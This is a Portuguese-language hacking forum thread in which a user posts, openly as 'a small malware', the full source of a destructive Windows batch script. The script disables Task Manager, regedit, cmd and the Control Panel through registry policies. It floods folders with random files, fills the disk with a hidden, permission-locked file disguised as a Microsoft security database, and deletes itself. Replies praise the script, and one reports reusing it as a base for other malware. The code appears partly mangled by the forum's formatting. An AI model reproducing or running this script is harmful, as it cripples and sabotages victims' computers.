Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Um pequeno malware em batch !

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Batch Um pequeno malware em batch !

    Boa noite pessoal, hj como estava sem nada para fazer, resolvi criar um malware pequeno em .bat
    Bom, o que ele faz:
    *Desabilita vários componentes do sistema operacional (painel de controle, cmd, regedit, etc...)
    *Gera arquivos de nome aleatorio em todas as pastas do sistema operacional
    *Cria um "dummy" que consome todo o espaço vazio do hd

    Segue o codigo fonte :

    Código PHP:
    @Echo OFF
     
         reg add 
    "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /"txtfile" />NUL 2>&1
     
    FOR /"tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do (
    tar)
         
    reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /"RestrictRun" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /"DisableTaskMgr" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /"NoClose" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /"StartmenuLogoff" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /"NoViewContextMenu" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /"NoTrayContextMenu" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /"NoChangeStartMenu" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /"NoControlPanel" /"REG_DWORD" /"1" /f     >NUL 2>&1

         reg add 
    "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /"DisableRegistryTools" /"REG_DWORD" /"1" />NUL 2>&1

         reg add 
    "%%a\Software\Policies\Microsoft\Windows\System" /"DisableCMD" /"REG_DWORD" /"2" />NUL 2>&1
    )
     
    setlocal enabledelayedexpansion
    Set File
    =0
     
    For /"Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@)
    Goto :
    Dummy
     
    :Copy
    Fsutil file createnew 
    "%*\%Random%%Random%%Random%%Random%%Random%" >NUL 2>&1
    Set 
    /A File+=1
    If !FILEEQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*)
     
    :
    DUMMY

    Takeown 
    /"%Windir%\winsxs" >NUL 2>&1
    Icacls     
    "%Windir%\winsxs" /Grant TODOS:>NUL 2>&1

    For /"tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
        
    Set Size=%%f
        Set Size
    =!Size:~-0,-6!
        
    Set Size=!Size!000000
        Fsutil file createnew 
    "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
    )
    Takeown /"%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
    Icacls 
    "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:>NUL 2>&1
    Attrib 
    "%WINDIR%\winsxs\Microsoft Security Database.msd" +++>NUL 2>&1
    Icacls 
    "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:>NUL 2>&1
     
     
    :FIN
    Del 
    /%0
    Exit 
    Obrigado e até mais,
    Desantao
    sigpic
    Similar Threads

  • Font Size
    #2
    Vlws cara, utilizei seu malware como base para o q estou desenvolvendo! vlws mesmo, sem vc eu ainda estara fudido! Brigado cara, continue assim

    Comment


    • Font Size
      #3
      Tenho medo só de olhar o código kkk

      Boa cara, muito bom.. (:

      Comment


      • Font Size
        #4
        Postado Originalmente por Niickguitar.dll Ver Post
        Tenho medo só de olhar o código kkk

        Boa cara, muito bom.. (:
        Olha nigakit saiu da administração ?

        Comment


        • Font Size
          #5
          Pode não ser

          Postado Originalmente por HackTheSC Ver Post
          Olha nigakit saiu da administração ?

          Este pode não ser o Nik que você está pensando.
          Nickguitar.dll ainda é da Adm. Este este Nick ao qual você se refere acima está escrito com dois "i"
          Niickguitar.dll e o da Adm só tem um "i": Nickguitar.dll.
          Why use Windows? If I have the door ;-)

          Comment


          • Font Size
            #6
            Ótima base pra quem está começando a desenvolver.

            Comment

            X
            Working...
            X